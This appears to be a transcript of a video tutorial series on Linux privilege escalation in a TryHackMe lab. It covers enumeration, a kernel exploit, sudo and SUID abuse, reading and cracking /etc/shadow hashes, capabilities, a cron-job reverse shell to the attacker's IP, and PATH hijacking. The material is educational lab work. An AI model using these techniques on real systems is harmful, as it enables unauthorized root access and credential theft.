Welcome. In this series, I'll be demonstrating Linux Privilege Escalation. Particularly in this video, I'll be demonstrating enumeration for Linux required for Linux Privilege Escalation. And the following videos, I will explain about um, privilege escalation techniques, all the 6 privilege escalation techniques. So let's jump right into the video. So what does privilege escalation mean? So privilege escalation usually involves going from a low permission account to a high permission one, like root user, which is high permission one. And more technically, it's the exploitation of vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the user. So all gaining higher privileged user is the particular goal. So we need system level access because we are trying to reset passwords, bypassing access controls to compromise protected data, editing software configurations, enabling persistence, changing the privileges of existing or new user, execute any administrative command. So these are the applications of gaining a root shell. So we are trying to enumerate, and I have connected via VPN. So there are 2 connection methods using attack machine as well as VPN. So this is sudo open VPN. This is a particular command for connecting via VPN. First we need to start the machine and connect through VPN. So we can get the VPN configuration file over here. So let's click on this and get the configuration file, and we get an internal virtual IP address, and we get the connection as connected. So this is how you need to connect via VPN. And once the particular configuration file is downloaded, let's do sudo open VPN and the particular file name. And I have SSH into Karen's box. Let's exit out of this, and let's exit out of this as well. So it is just SSH the username at host. So let's copy this particular username. So the credentials will be given in when you expand enumeration. And let's copy this username and let's paste it over here and at this particular IP address, and let's hit enter. And it's asking for Karen's password, the SSH logon password, and let's copy this password one and let's paste it. And we got a shell, but we cannot clear the screen, so we need to get a stable shell. Let's do which Python. So we get user bin python, and let's do python-c import pty.spawn/bin/bash. So that is the command to essentially get a stable shell, bin bash shell. So we're saying the terminal type to be a bin bash. And we get a stable shell. Now let's begin our enumeration. So particularly, what is enumeration? After we gather the data, we try one task after another to like a checklist. We try one task after another, and if it succeeds, we document it. If it fails, also we can document it, but it's not necessary. So that is particularly enumeration. So performing tasks one by one in a hope that one would succeed. is to enumerate. Now let's start with the basic command, which is hostname. So the hostname will return the hostname of the lab machine. So although this value can change, can be easily changed or have a relatively meaningless string, like something like Wade hyphen 7363 is a meaningless string, so it can have that as well. But it is usually when you need to understand the hostname of hostname in a corporate network, you may get like SQL prod 1. So for a production SQL server, that is why this command is useful. And let's do uname-a. This will print the system information, giving us additional detail about the kernel used by the system. So it will give the kernel version. It will give that it's a Linux OS, and it will give the kernel version as well. So next, let's do /proc/version. So the proc file system, or procfs, provides information about the target system's process. You will find proc on many different Linux flavors, making it an essential tool to have in your arsenal. So we'll do cat/proc/version. So it will give us essentially the information about the target processors, whether it will give information about the kernel version, and whether a GCC is installed, a compiler is installed. So that is /proc/version. So now let's do cat etc/issue. So it will suggest that GCC version 4.8.2 is installed. Now let's do cat /etc/issue. So this particular file gives us the operating system, which is the Linux flavor, which is Ubuntu, and also the particular Ubuntu version. So next, let's run ps. This will list all the running processes in the Linux system, and we can do ps-a to view all the running process. PS will give you a limited number of process, but -a option will give you a lot of process with process ID with the command that started this particular process. And we can do ps-axjf. So to view the process tree, to see the tree formation. So you can see the tree formation right over here. So that is the parent process ID, and this is the child processes. So parent process ID and child processes, you can view it right over here. So the first column is parent process ID, and the second column is process ID, and we have the TTY type, and we have user ID, we have the time, as well as the command. Let's do env, and we can also do ps-aux. A is for show process for all users, and U is for display the user that launched the particular process, and X is for show the process that are not attached to a terminal. So this is ps-aux, so all the process not attached to a terminal, and display the user launched by you display the user as well who launched the process. And now let's do env command. This will show all of the environment variables. So we are particularly interested in path environment variable. So it is helpful in doing path hijacking. in my upcoming videos, you will see why path variable why manipulating path variable leads to high like gaining high privileged user such as root. And let's do sudo -l. So sudo -l will list all the commands that the user can run as sudo. So abusing these binaries or abusing these list of commands will gain us root privileges. So sudo is to run a particular command with higher privileges than the current user. We use sudo. Let's do ls to list the files. Let's do ls-ail to list all the files and inode number as well as long listing with their particular permissions, with the user and group permission and the modified time, date and time, and the number of bytes, the inode number. So we can view all this in ls-ail. Next, let's do the command id. This command will give us the general overview of the user privilege level as well as group membership. So the user privilege level is a normal or a local user. So for for a root user, it will be UID will be 0. So we do ID root, and we get the UID as well as GID as 0. So for users, it will be 1000 and above. Now let's do cat etc passwd. So this discovers the users and services which are there in a particular Linux system. So this output we can pipe it with grep sh dollar to find all the users with the shell, with a bin bash or a zsh or any kind of shell. And we find 3 users, so we just need to extract the usernames. We pipe it this output to cut command. So cut -d for delimiter as a colon, something that separates each of these fields, and -f to specify the field, which is the first field or the first column. So this is particularly helpful to extract all the usernames with the shell and from the etc passwd file. Next command is history. It will display the history of commands, and these are the history of all the commands which are executed. And let's do ifconfig. So ifconfig for to view the network interfaces, to view the network information, IP configurations like IPv4, IPv6 address as well as the MAC address. So inet ADDR is IPv4 address, and the inet6 is IPv6 address, and HW ADDR is the MAC address. And IP route to see the network route that exists. And let's do netstat command. So netstat is an initial check for existing interfaces as well as network routes. So it is worth looking into existing communications. So it will list all the ports and existing communications and established connections as well. So the established connections, you can view the state as established. So those are the established connections, as well as the listening ports where SSH is listening on this particular machine. So that is being displayed over here. and -A to list all the ports, and we can combine it with the -T or -U to list only TCP and UDP protocols respectively. Next, let's do netstat-L. So it will list the ports which are there in listening mode. So these are some of the Unix domain sockets, and let's do netstat-lt to list the listening ports which are available for TCP protocol, and let's do netstat-s to list the network usage statistics by a particular protocol. We can combine it with the -t or -u to limit the output to a specific protocol. So we can look over here, the UDP protocol, the packets sent and received, as well as the TCP active connections, passive connections, failed connections, segments, resets sent. So we can view all this statistics, which the network usage statistics by each protocol. Now let's do netstat-tp. So list connections with service name and process ID. So it will list with the connections with service name as well as the process ID. So we can see over here the local address, foreign address, state which is established, as well as the process ID. So let's do netstat-ltp to list the listening ports. So SSH is listening, some other service is listening called IPP, and so this is how to view the connections as well as listening ports. Next, let's do netstat-I to view the interface statistics. So the interface, which is ETH0 as well as localhost for LO, will be displayed, and the statistics for this interface will be displayed. And we can also do netstat-ANO, which can be broken down as -A for display all sockets, -N for do not resolve names, -O for display timers. So that will essentially display all this particular fields for all sockets and do not resolve names as well as the timers. Next, let's do find command. So find is essentially to search for something in Linux system, because everything is a file. We are searching for a file. So let's do cd home and cd mat. Let's do ls. Let's view whether desktop or documents or downloads has any file. So we do not find any file here. And let's do ls, and we can now do the command find dot. So it will search in the current directory and beyond. It will recursively search from the current directory and beyond. And let's do flag1.txt. And let's redirect standard error to /dev/null. and we get flag1.txt, and we can also search from the home folder, the same file from the home folder. Instead of dot, we specify /home. Instead of dot, we specify /home, and it will give us the full path of the flag1.txt. And next we can do -type D for searching all the directories, for searching only the directories, and -name to search for the name of the file, name of the directory called config, and do /dev/null, redirect the standard error, and we find a bunch of config files. And we can also find files with 777 permissions, which is readable, writable, and executable by all the users. Yeah, by this particular command, -perm is for finding the permissions, right? And we do not find any file. So let's do another one, which is to find only the executable files by all the users. So the executable permission set, so for all the user group and others. And we wait for some time, and we do not get any results as well. Now let's do find /home and user mat. Find /home and the -user as mat, and let's hit enter. And we find all these particular files that are owned by mat in the home folder and beyond. Let's do -ls to long list all the previous files. So these are the list of files that we can find. And let's do find /-mtime and 10, which is the find the files that were modified in the last 10 days. We got a lot of errors, and we do not find any file. So let's do --a-time, so find files that were accessed in the last 10 days, and we do not find any file as well. Let's do -cmin -60 to find the files that were changed within the last hour or 60 minutes. Let's do cmin and -60. And we get a number of files. Let's do -amin -60, so to find files accessed within the last hour or 60 minutes. And let's do find / and -size and search for exactly 50 MB file. I don't think we'll find it, but we can search for that. So we did not find any file. And let's do find / permission is equal to set UID permission, which is -u is equal to s, or we can do 04777, that is also correct, -04777, and -type f, and we find all the SUID binaries. So this is how we can enumerate all the information related to a particular Linux system. And we do -ls to long listed. So uh, thank you for watching till now, and please like and subscribe to the channel, and do find my red teaming or ethical hacking videos on this channel. Thank you. Now let's look into this privilege escalation technique, which is kernel exploits. And uh, basically a kernel is a stream of bytes. So kernel is something between that sits between your hardware as well as your user applications and allow you to communicate with them. So exploiting that vulnerability is gives you potentially root privileges. So kernel on Linux system manages the communication between components such as memory on the system and applications. This critical function requires the kernel to have specific privileges. Thus, a successful exploit will potentially lead to root privileges. So the kernel exploit methodology is simple. So first we need to identify the kernel version. So we can do that using the commands uname-a and search and find a exploit code for the kernel version of the target system, then run the exploit. So these are some of the kernel exploit methodology. Now let's SSH into Karen's box, and we have to type SSH Karen at this particular IP address, whatever IP address you have been given, and yes for fingerprint. And let's type in Karen's password 1, and let's upgrade the shell. So which Python, and you'll get user bin Python, and let's do python-c import pty.spawn bin bash. So this will essentially upgrade our shell to a bin bash shell using Python. And we get a stable shell. Now what we need to do is we need to find the kernel version as well as the operating system. We can use the command uname-a, and this will find that it is a Linux system as well as it is using 3.13.0, and let's do search exploit on this. So search exploit is a command used to search for exploits in ExploitDB as well as Metasploit framework. So let's give double quotes. I don't think we need to give generic and all. Let's delete that and let's wait for some time. So let's do a web search on this as well. We got some results. Let's see what and all we can find in this particular exploit. So it's marked red, right? 3.13.0. So I will choose that and this particular exploit, and let's do search exploit -x to view the particular exploit. So this will view the particular exploit, and it's overlays local root in Ubuntu. So this is what we were looking for. We are looking for local privilege escalation. So this is a C code, and we get the details on how to potentially exploit this vulnerability and gain root privileges. So let's do gcc ofs.c -o ofs, and let's run that script as well. So it's just compiling the C code and running the script. So let's do -exploit -m to download the particular exploit, and it is downloaded in the downloads folder. Now let's set up a Python listener, HTTP listener. First, let's allow the port 80 because it's an incoming connection. We are setting up Python HTTP server. So let's do allow out as well. And let's set up a Python HTTP server on port 80 and already in use. So when this happens, just make sure you're viewing the list of files on port 80 and what is running on port 80, and just kill those process. I think some Docker file is running. Kill -9 to kill the process. Let's copy the process ID and let's copy this as well. Now let's set up HTTP server, and the HTTP server is running. Now let's do wget on this. So let's do wget. Let's first move to temp folder, right? Because that is world writable folder. Let's do cd/temp, and in temp folder we do wget http://172.20.10.2, which is my IP address, or I guess we should give the IP address of ton 0 because we're connected through VPN, right? So we'll give the IP address of ton 0. We'll copy this IP address and http:// and IP address port 80. Let's start the HTTP server again, port 80, and we specify the name of the file. I just forgot what's the name of the file. So we move up and it is 37292.c. Let's just copy that and let's paste it. And 404 error not found. And we did not get a GET request, so let's do ls and let's grep for that particular file. So we have the file, so let's just copy that. Let's start the server again. And 404 not found. We can do curl. So let's try with curl command, and let's do -o and ofs.c, and curl is not installed. So let's do wget and let's do ls, and we have downloaded the file. So let's do cat ofs.c, and oh, we downloaded the error 404. So it says file not found. I will debug that later. So let's just create a file, ofs.c, and we paste the contents of this particular .c file. And we just copy this. And we paste this particular file and let's save it. Now let's compile this into a script using gcc command, gcc ofs.c and -o ofs. So a file will be created, a script will be created actually with the name ofs, and we do ls, we get ofs.c. Let's do change mode plus x ofs.c and ofs and for /ofs, and we get the root user. So we are root on this user. So we got the root shell. So that is how simple a kernel exploit vulnerability is. So let's do cd home mat and let's get the contents of flag1.txt, and we get the flag here. Let's paste it in the particular tryhackme website. So let's paste it here and let's check, and there you go. So that was all about kernel exploits and how to gain higher privileges using kernel exploits. Now let's move on to our next privilege escalation technique, which is sudo abuse. So sudo is a command which is generally used to gain higher to run some commands by higher privileges or root privileges. So under some conditions, system administrator may need to give regular users some flexibility on their privileges. So this is just an example where a junior SOC analyst want to use Nmap regularly, but he wouldn't be cleared full root access. So the system administrator can run only Nmap with root privileges by keeping the user privilege level throughout the system. So that is where this vulnerability exists. And let's move to GTFOBins. So this is a very good privilege escalation. We can find privilege escalation techniques here, and we can find sudo SUID abuses for the particular uh, binary which is being installed with the SUID or with sudo privileges. So it's kind of a repository for all this. So we have SSH into the box. Let me zoom in. So let's do sudo-l to list the binaries that can be run by the user using the command sudo. And these are the three binaries. So find, less, and nano. We can do a privilege escalation using any of these, but I'll choose find. And let's do Control F and let's do find. Let's find the find. And let's click on find and let's go to sudo and let's just copy this command. So this function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped. So we are preserving the privileges. So let's do sudo and the command which we just copied. So we get the root shell. So this is how we can escalate privileges using sudo abuse. So we are abusing the sudo privileges and gaining shell with that. Let's do cat flag2.txt. Cat flag2.txt. and we find this particular flag, and let's copy this and paste it in tryhackme platform. And let's see the other things. How many programs can the user Karen run on the target system? I guess the answer is 3. How would you use Nmap to spawn a root shell if your user had sudo rights on Nmap? So let's just search for Nmap. And let's click on this. Let's go to sudo and let's copy this. And let's paste it over here. Sudo and then the command. So let's move on to the next topic. Now let's move on to our next privilege escalation technique, which is SUID abuse. SUID or SGID binary abuse. So SUID is a special permission in Linux. So we have read, write, and execute permissions. The similar way, the binaries are given a higher privilege than their usual level. So it's known as SUID, which is set user identification, as well as SGID, which is set group identification. So these allow the files to be executed with the permission level of the file owner or the group owner respectively. So if we are running, if the binary has SUID bit set, and it has root, it is owned by root user, it will run as root and will gain higher privileges. So this find command will detect the SUID binaries, so the files which have SUID binaries set, so that will be displayed using this particular find command. And we have a list of SUID binaries. So particularly base 64 is not a binary which will find you know, on a system level. So the others are a common SUID binaries which are set, but base 64 looks like the one which is being installed. And let's copy this and let's paste it. So it's just reading the files of a particular input file, and it's trying to decode that. So let's try to read etc pass wd or etc shadow, and let's find the particular password hashes for the user, for other users like Gary Conway and user2, and we have Karen's password as well. So this essentially lets us to do lateral movement or lateral privilege escalation rather than horizontal level. So let's do nano Gary and let's paste it, and let's do nano user2 and let's paste this particular hash. And let's do nano user2 and let's paste this hash, and let's save it. Control O, Control X to save it. Now what we do is we use hashcat. We can save Karen's password as well, but we know it's password 1. So let's do John double dash word list, and we choose rocky.txt as our word list file and Gary as our hash. Now we cracked the hash, which is test123, and let's crack the hash for user2. So the user2's password is password 1, so it's same as Karen's password. So now let's go to particularly tryhackme, and let's paste it here. So great comic book writer, I guess it is Gary Convoy. I am sorry if I'm pronouncing it wrong. Uh, it's this particular thing. And what's the password of user2? So let's just copy that password. And let's paste it. And correct answer. And let's go to, let's move laterally, right? Or let's weave the contents of flag3.txt. So let's do home directory flag3.txt. Okay, so that's not the home directory. Let's do cd/home and cd ubuntu, and let's do ls, and now let's do the same thing but just flag3.txt, and we get the flag because it is because base64 is able to read the contents of the particular files using root privileges. So that is the particular exploit. Because base64 is owned by root, the whatever base64 executes is also is executed by root level privileges. So this is exactly a SUID binary abuse. And so we can move laterally now. We can just do su hyphen particularly Gary, and so let's just copy this. So you can see even the pastability file being read, the etc shadow file being read, and we got the particular hash, and we cracked the hash of that, and we cracked the hash of that as well. Let's copy this and let's do switch user hyphen what is the name of the user again? Yeah. So this particular user, and let's paste in the password, and we get ID, we get that particular user ID as well. We can even do switch user user2 and type in password 1. Let's just copy this password and let's just paste it, and so we do ID and we get user2 with a different user ID which is 1002, and we can do host name and all the comments. So this is how to move laterally via SUID abuse. Thank you. Now let's move on to the next privilege escalation technique, which is Linux capabilities. So what are Linux capabilities? Basically another method of system administrators can use to increase the privilege level of a process or binary is capabilities. Capabilities help manage privileges at a more granular level. For example, if a SOC analyst needs to use a tool that needs to initiate a socket connection, a regular user wouldn't be able to do that. So the system user does not want to give this user high privileges. They can change the capabilities of the binary. As a result, the binary would get through its task without needing higher privileged user. So it's just similar to SUID binaries. We are giving higher privileges to the binaries as well, but the SUID the SUID permission won't be set on these binaries. I'll explain in a while why that is the case. So let's do get cap -r to get the capabilities, and you will see that cap SUID set UID is set on this execution policy. But when we do ls home char and vim, you will see that there is no set UID binary, set UID permission set for this. So that is why it is not able to detect whenever we do enumeration for SUID binaries. So using that find command, you cannot find this particular binary. So let's do vim and let's do Python 3. So we can use this. You will get this particular how to do this in GTFOBins. But let's do Python 3 import os.setUID to set the permissions, and let's do os.execl, and let's do bin sh /bin/sh, and let's do sh -c. So these are all the the commands given to the commands with the options given to executing to execute the particular line. And let's do reset, and let's do semicolon, and let's do exec sh. So that is the particular command, and let's hit enter. Just vim gets vim just starts, and we do not get execution. Why is that the case? I guess it is because we didn't give -c. And let's execute this command, and we get the root shell. So we can do id who am I and all those commands. And let's do cat flag 4.txt. Cat flag 4.txt, and no, let's do cd home, let's do cd ubuntu, and let's do ls, and let's do cat flag 4.txt, and we get the contents of this file. Let's copy this and just paste it and check, and it's a correct answer, and we have completed this module. So let's just refresh this, and thanks for watching. Please like and subscribe. Now let's move on to our next privilege escalation technique, which is cron jobs, abusing cron jobs. So cron jobs are scripts or binaries that execute at a specific time or a regular interval of time. So they run with their privileges of their owners, not the current user. So if cron job so if it inherits the privileges of its owner, and if the idea is simple, if there is a scheduled task that runs with root privileges, we can change the script that will be run, and we can essentially gain root privileges. So let's do ls-l this particular file, and the previous command was to weave the cat etc cron tab to weave the particular cron jobs, and this is to weave. We can modify this. We can do nano that particular cron job, and let's do bash-i, and &0 and &1. Let's do /dev/tcp, so the device files and TCP, and let's give the IP address of ton0, because we are connected with VPN, we have to give 10.0, or else it will be WLAN 0 or ETH 0 based on your network interface card, how the network is connected. And /4444, and let's save it. Now let's start the listener, and we should get a shell in just a while. And we got the root shell. So we started our listener and we got the root shell. Let's do ls id who am I. We get root, and let's answer these simple questions like flag and all. So what are the contents of flag5.txt? So let's do cd home, and let's do ls cd /cd /home, and let's do cd ubuntu, and let's do cat flag5.txt, and we get this particular flag. We just copy this and paste it. And we can also find Matt's password in etc shadow file, right? So let's do cat etc/shadow. Let's copy this hash and let's paste it in a file. So let's do nano hashes, and let's paste it. Let's do John _word list and specify the word list as rocky.txt. So user share word list rocky.txt is the full path. And let's do hashes, and let's hit enter, and we will get the password as 123456. Let's copy this and let's paste it. So we can move laterally with this as well, but that is left for you to do. And please like and subscribe to the channel. Let's move on to our next privilege escalation technique, which is path hijacking. Essentially, let me explain it in simple words. If an application with the setuid bit is running another script, if it is defined with relative path rather than absolute path, we can create another file or binary with the same name, and that script would run and essentially give us the root privileges. So that is all about path hijacking. After you complete this lab, you will get an idea. So let's search for SUID binaries. This is the command, and let's run this command, and we get an unusual binary, which is murdoch/test. And let's go to home/murdoch, and let's do ls, and we have the test binary. Let's do ltrace, or we can do strings as well. Let's do ltrace and /test, and it is setting a UID, setting a GID, and it's giving the system command, which is thm. So thm is the name of the binary, and it is saying thm not found. So we can create this binary in temp folder. So let's do cd/temp, and let's do nano thm. And once you create this file, we can do shebang bin bash. So we are writing a shell script, and we can do bin bash -p to preserve the permissions. And let's hijack the path variable to find so that the THM located in the temp folder is found first. So we do export path is equal to /temp. So that is the first thing you should find, and $path $path. And I won't run this command because I already have hijacked this. So if you do echo $path, you will find the /temp as the first folder the particular path variable will look. And let's do export. So the command which I was doing is export path is equal to /temp $path. So path should be in caps, and /temp. So now let's execute this binary. Let me find that. So let's do ls, and thm is stored. We can change mode. We have to give execute permissions for the thm to run. So we do chmod +x thm, and let's do cd/home/mardoc, and let's do ls, and let's do /test, and we get the root privileges, root shell, and let's look for any flags. cd/home, let's do ls, we get mat mardoc ubuntu, let's do cd ubuntu, let's do ls, we do not find anything there. Let's go to mat users home, and let's look for flag, and we found the flag. So let's do cat flag6.txt, and let's copy this, and we can paste it over here, and let's check for that. So please do like and subscribe to the channel, like the video and subscribe to the channel.